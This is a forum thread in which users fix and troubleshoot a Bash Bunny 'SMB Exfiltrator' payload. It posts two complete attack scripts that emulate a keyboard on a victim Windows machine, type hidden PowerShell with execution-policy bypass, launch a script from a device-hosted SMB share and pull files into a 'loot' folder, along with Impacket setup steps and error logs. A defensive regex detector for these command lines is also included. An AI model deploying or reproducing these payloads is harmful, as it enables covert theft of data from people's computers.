Fixed the SMB Exfiltrator :)

jblk01


Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what.  Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1).  @Darren Kitchen any chance these changes can be reflected on the official Github repo?

 

#!/bin/bash
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE2......Ethernet Stage
# SETUP.......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script
 
 
 
######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Make temporary loot directory
mkdir -p /loot/smb/
# Delete any old exfiltration data
rm -rf /loot/smb/*
# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator
 
 
######## ETHERNET STAGE ########
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
# Re-enable ICMP/echo replies to trip the powershell stager
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
 
 
######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED SETUP
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
LED B 100
# Wait until files are done copying.
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
 
 
 
######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE
# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
# Clean up temporary loot directory
rm -rf /loot/smb/e/*
# Sync file system
sync
 
 
######## FINISH ########
# Trap is clean
LED FINISH

The above didn't work for me, Windows 10.

 

I had to edit this line and pass the username and password:

RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) {NET USE \\172.16.64.1\IPC$ /u:root hak5bunny; \\\\$HOST_IP\\s\\s.ps1; exit;}; sleep 1;  }\""

specifically this part:

NET USE \\172.16.64.1\IPC$ /u:root hak5bunny;

Hey @joeservo, sorry that I'm late.  I realized that I partially rewrote the script and didn't share it here, I apologize for that.  Here it is for both you and others if need be:

 

#!/bin/bash
#
# Title:         Faster SMB Exfiltrator version 2.0
# Author:        Hak5Darren
# Props:         ImNatho, mike111b, madbuda, jblk01
# Version:       1.6.1
# Category:      Exfiltration
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, Ethernet
#
# REQUIREMENTS
# ============
# SETUP:
#
# 1. apt update ; apt install gcc
# 2. pip install impacket
# 3. cd /tools/
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
#
#
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE1......Ethernet Stage
# STAGE2......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script


######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION
# Make temporary loot directory
mkdir -p /loot/smb/
# Delete any old exfiltration data
rm -rf /loot/smb/*
# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator


######## ETHERNET STAGE ########
LED STAGE1
ATTACKMODE RNDIS_ETHERNET
# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &


######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN powershell
Q DELAY 1000
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q DELAY 500
Q ENTER
LED SPECIAL
# Wait until files are done copying
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done


######## CLEANUP ########
LED CLEANUP
# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE
# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
# Clean up temporary loot directory
rm -rf /loot/smb/e/*
# Sync file system
sync


######## FINISH ########
# Trap is clean
LED FINISH

 

Edited by jblk01
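Added detection example, not part of this thread or of either payload version: it scans constructed process-creation command lines (modelled on the RUN WIN one-liner in the first post and the Q STRING one-liner in the rewrite, plus two benign controls) for the traits the two versions share: a hidden PowerShell window, an execution-policy bypass, a .ps1 launched straight from a UNC path on a bare IP address, inline credentials in `net use`, and the port-445 polling loop. The indicator names, regexes and threshold are my own assumptions, not anything shipped with the Bunny or Impacket.

```python
import re

# Constructed sample command lines (process-creation events), modelled on the
# RUN WIN / Q STRING lines posted in this thread, plus two benign controls.
SAMPLE_CMDLINES = [
    r'powershell -WindowStyle Hidden -Exec Bypass "While ($true) { If ((New-Object net.sockets.tcpclient (172.16.64.1,445)).Connected) { \\172.16.64.1\s\s.ps1; exit } }"',
    r'powershell -windowstyle hidden -exec bypass "net use \\172.16.64.1\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\172.16.64.1\s\s.ps1; exit"',
    r'powershell -NoProfile -File C:\scripts\backup.ps1',
    r'net use Z: \\fileserver.corp.local\share /persistent:yes',
]

# Each indicator is one trait of the payload's one-liner. Names are my own.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_bypass": re.compile(r"-(?:exec(?:utionpolicy)?|ep)\s+bypass", re.I),
    # script run straight from a UNC path whose host is a bare IPv4 address
    "unc_ps1_by_ip": re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\\S+?\.ps1", re.I),
    # 'net use ... /u:<user> <password>' with the password on the command line
    "net_use_inline_cred": re.compile(r"net\s+use\b.*?/u(?:ser)?:\S+\s+\S+", re.I),
    # the polling loop that waits for SMB (445) to come up on the attached NIC
    "tcp_probe_445": re.compile(r"tcpclient\s*\(.*?,\s*445\)", re.I),
}

def indicators_hit(cmdline):
    """Return the names of all indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def classify(cmdline, threshold=2):
    """'suspicious' when at least `threshold` distinct traits co-occur."""
    hits = indicators_hit(cmdline)
    verdict = "suspicious" if len(hits) >= threshold else "benign"
    return verdict, hits

def triage(cmdlines):
    """Classify every line; returns [(verdict, hits, cmdline), ...]."""
    return [(*classify(c), c) for c in cmdlines]

if __name__ == "__main__":
    for verdict, hits, cmd in triage(SAMPLE_CMDLINES):
        print(f"{verdict:10} {','.join(hits) or '-':45} {cmd[:60]}")
```

Feed it Sysmon event 1 or Windows 4688 command lines instead of the constructed list; a single hit (e.g. just `-exec bypass`) is common in admin scripts, which is why the verdict needs two or more traits together.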

Hello,

 

@jblk01 it didn't work for me in Windows 10.

The LED is blinking blue and has been for hours.

I got this in run

powershell -WindowStyle Hidden -Exec Bypass "While ($true) { If ((New-Object net.sockets.tcpclient (172.16.64.1,445)).Connected) { \\

Which version of the payload did you use? The first one posted or the rewritten one further down? The string you are referring to is part of the first post/version, but not the second (newer) one. Try the rewritten one posted on the 4th of July instead.

When I start the SMB server manually I get this error:

 

root@bunny:~# python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
[1] 9623
root@bunny:~# usage: smbserver.py [-h] [-comment COMMENT] [-debug] [-smb2support] shareName sharePath
smbserver.py: error: unrecognized arguments: -username -password s /loot/smb
 

The Content of the smbserver.log

  GNU nano 2.2.6             File: smbserver.log

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

In what way did you get Impacket onto the Bunny? Downloaded from Github as per the instructions in the post from the 4th of July or installed using deb package? Your log indicates an older version (0.9.16-dev) than the payload script expects (0.9.19).

Can I uninstall the 0.9.16-dev on the Bash Bunny?

Or do I just have to copy the new version from GitHub?

 

After copying the new version, this is the content of the smbserver.log:

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

 

But when I try to start the SMB server I get this:


[1] 2243
root@bunny:/loot# Traceback (most recent call last):
  File "/tools/impacket/examples/smbserver.py", line 85, in <module>
    server.addCredential(options.username, 0, lmhash, nthash)
AttributeError: SimpleSMBServer instance has no attribute 'addCredential'
Hi @KinderRiegel, I was seeing the same error as you and I found a workaround:

Make sure your internet connection is shared with the Bunny.

Then on the Bunny:

First, do 'timedatectl set-time' followed by the current year, month and date.

Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'.

For me, this failed on a few requirements so I had to go in and:

 

'pip2 install setuptools-rust'

'pip2 install cryptography'

'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg'

'rm -f pyasn1-0.4.8-py2.7.egg'

'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz'

'tar -xzvf pycryptodomex-3.10.1.tar.gz'

'cd pycryptodomex-3.10.1 && python setup.py install'

'cd /tools/impacket/ && python setup.py install'

 

And from there it was working properly. 🙂

 

Edited by jblk01